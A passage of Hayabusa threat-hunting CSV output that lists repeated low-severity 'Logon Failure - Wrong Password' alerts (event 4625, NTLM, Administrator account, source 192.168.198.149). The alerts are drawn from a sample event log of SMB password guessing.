NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: 